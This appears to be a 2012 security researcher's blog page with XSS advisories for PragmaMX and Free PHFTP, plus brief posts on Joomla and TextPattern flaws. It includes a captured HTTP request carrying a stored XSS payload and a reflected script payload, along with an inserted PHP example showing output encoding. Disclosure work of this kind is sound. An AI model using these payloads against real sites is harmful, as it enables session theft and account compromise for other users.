Tuesday, 31 January 2012

Persistent XSS in PragmaMX 1.2.10


# TITLE ... # Persistent XSS in PragmaMX 1.12.0 for logged in users    #
# DATE .... # 30.01.2012 .......................................... #
# AUTHOR .. # http://hauntit.blogspot.com ................ #
# SOFT LINK # http://www.pragmamx.org ............................. #
# VERSION . # 1.12.0 .............................................. #
# TESTED ON # LAMP ................................................ #
#...................................................................#

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
 "pragmaMx - the fast CMS". :)
You should try it!

# 2. What is the type of vulnerability?
 This is persistent cross-site scripting for authenticated users.

The vulnerability exists in "Private Messages".
Here I present You a sample HTTP request (captured with BurpProxy).

...cut...
POST /pragmaMx_1.12.0/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Ubuntu; X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://pragmaMx_1.12.0/html/modules.php?name=Private_Messages&op=send
Cookie: mxA9649D14D6AAF90E4A70576BF4ACC1=6db52d6de453f7a5890b36ebafd99fda; tab_ya_edituser=0; PHPSESSID=d7nhrjbs5i2pmjvo6vuj1hg2j1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

name=Private_Messages&op=submit&to_user=adminek&subject=persistent+MSG&image=icon1.gif&message=hi%21%0D%0A%27%3E%3Cimg+src%3Dy+onerror%3Dalert%28%27i+am+watching+you%27%29%3B%3E&msg_id=0&submit=Submit
...cut...

What happens next depends on what code You put in the $message parameter.
Persistent XSS code could be added when You decide to reply, too.

So click the 'Reply' button and put Your XSS code in the $message parameter.

# 3. Where is bug :)

The $message parameter in the source code. We need (more) validation here. :)

# 4. More...

- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
- http://www.exploit-db.com/exploits/18439

# Best regards
#

Reflected XSS in Free PHFTP 4.2

# TITLE ..... # Reflected XSS in Free PHFTP 4.2 ..........#
# DATE ...... # 30.01.2012 ............................. #
# AUTHOR .... # HauntIT Blog ............................. #
# SOFT LINK . # http://www.mindcatch.com/ ......... #
# VERSION ... # 4.2 ............................. #
# TESTED ON . # LAMP ............................. #
#............................................#

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is an FTP client written in PHP. Very nice :)
You should try it.

# 2. What is the type of vulnerability?
It's a reflected XSS located in the "Host" field of the default PHFTP start page.
Set "Host" to:
'><script>alert(123)</script>
to see the vulnerability.

# 3. Where is bug :)
ftp.php
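Both advisories above (the stored $message in PragmaMX and the reflected "Host" field in PHFTP) come down to the same defect: user input is written into HTML without output encoding. The following is an added example, not code from PragmaMX or PHFTP; the function names are hypothetical, and it shows an illustrative vulnerable renderer next to the hardened form, run against the two payloads quoted above.

```php
<?php
// Added example, not code from PragmaMX or PHFTP: the same output-encoding
// defect behind both advisories above, shown as an illustrative vulnerable
// renderer next to a hardened one. Function names are hypothetical.

// Vulnerable pattern: a user-controlled value (the stored Private Messages
// $message, or the reflected PHFTP "Host" field) is echoed into HTML as-is.
function render_unsafe(string $label, string $value): string
{
    return "<p>$label: $value</p>";
}

// Hardened pattern: HTML-encode on output. ENT_QUOTES also encodes the
// single quote both payloads use to break out of an attribute.
function render_safe(string $label, string $value): string
{
    $enc = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>$label: $enc</p>";
}

// True when no tag or quote survived encoding.
function is_neutralized(string $html): bool
{
    return stripos($html, '<img') === false
        && stripos($html, '<script') === false
        && strpos($html, "'") === false;
}

// The two payloads exactly as they appear in the advisories above. The
// PragmaMX one arrives URL-encoded in the POST body; urldecode() applies the
// same decoding PHP performs when it fills $_POST.
$pmx_message = urldecode(
    'hi%21%0D%0A%27%3E%3Cimg+src%3Dy+onerror%3Dalert%28%27i+am+watching+you%27%29%3B%3E'
);
$phftp_host = "'><script>alert(123)</script>";

foreach (['message' => $pmx_message, 'Host' => $phftp_host] as $label => $value) {
    $unsafe = render_unsafe($label, $value);
    $safe   = render_safe($label, $value);
    printf("%-8s unsafe neutralized: %s\n", $label, is_neutralized($unsafe) ? 'yes' : 'no');
    printf("%-8s safe   neutralized: %s\n", $label, is_neutralized($safe) ? 'yes' : 'no');
    echo $safe, "\n\n";
}
```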

# 4. More...

- http://www.mindcatch.com
- http://hauntit.blogspot.com
- http://www.google.com

# Best regards
#

Thank You Joomla Security Team

Hi,


I should write here a little more, but maybe soon...

Now I can tell You about Joomla Security Team: they are fast and full-of-knowledge! ;)

Watch them, soon there will be a new release.

Best regards!

Monday, 23 January 2012

Little update here

3...2...1.. ;)

STOP ACTA!

No comments.

"rly."

Thursday, 19 January 2012

"Directional attacks" - You don't want it

In the last few days a friend of a friend asked me how his company could be "hacked like in the movies".
After a few minutes of laughter and some weird ideas, we had all the "plans of possible work" for this project.

After a few moments I saw that the company's page is extremely secure, so there won't be any possibility of an SQL injection attack... So I decided to "get in" a different way...
...and that's where the story about "How 'Directional Attacks' can threaten Your company" starts... :D

What more I can say about this project is: I'm very glad to work with You, see You soon! ;)
* "No info given" about the company's name, c'mon ;)

I'll answer all e-mails by 22-23.01, sorry :)

Saturday, 7 January 2012

SQL Injection in TextPattern 4.4.1

Link to TextPattern here!

(more -> soon)

Wednesday, 4 January 2012

[UPDATE] Joomla 1.7 Vulnerable to XSS

Let's start the Happy New Year with some reflection...

Reflection as "reflected XSS" in latest Joomla (1.7.3 for this post).

The scenario of this attack is quite simple: the attacker must build a file with XSS and send it to the victim.
For reflected XSS, when we are talking about Admin and Users, the situation could be like this:
- (mail to admin) hi admin, this is my file.html, could it be added to my Joomla Profile? (... or what ever else...;)  )
- wait, I must check it...
(...) and this is when the admin or another user could be exploited by this reflected XSS.

What do You think: Should it be public? :D

UPDATE (10.01.2012):

As there is a nice example of how devastating reflected XSS could be, I present You
a link to a PoC I found here (it is a well-known Polish portal about security and IT, enjoy!).

The Pastebin link is an example of what Aditya Modha and Samir Shah found in WordPress 3.3.
Nice work! ;)

(more -> soon... ;) )